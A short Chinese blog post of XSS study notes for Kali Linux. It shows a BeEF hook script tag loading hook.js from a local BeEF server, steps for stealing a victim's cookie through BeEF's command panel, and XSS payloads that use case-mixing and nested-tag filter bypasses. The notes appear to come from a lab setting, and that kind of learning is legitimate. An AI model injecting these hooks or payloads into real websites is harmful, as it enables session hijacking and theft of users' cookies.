kali 漏洞篇-xss 学习笔记

xss 同源策略

js 外链不受到“同源策略”影响

 

berff-xss

beef盗取cookie

beef-xss(需要手动为kali服务器安装此命令)

<script src="http://127.0.0.1:3000/hook.js"></script>

进入BEEF后我们先点击 Command Browser -> Commands -> 在Searche框输入cookie并回车 -> 进入新的页面后点击右下角Execute->之后点击中间出现的记录 此时我们就可以在右侧看到我们收到的cookie了。 完成全部操作后我们将得到一个格式为: php=xxxxxxxxxx;security=low样式的cookie

# beef 忘记登录账号密码,重置和查看  /etc/beff-xss/config.yaml 里面

 

payload:  

正常方式 <script>alert(1)</script>

大小写方式绕过 <ScRiPt>alert(1)</ScRiPt>

乱排序绕过 <scr<script>ipt>alert(1)</scr<script>ipt>

posted @   Cong0ks  阅读(215)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
历史上的今天:
2019-09-22 I4-6 Success Teacher:Taylor
2019-09-22 English trip EM3-PE 3A Roommate Teacher:Ginny
点击右上角即可分享
微信分享提示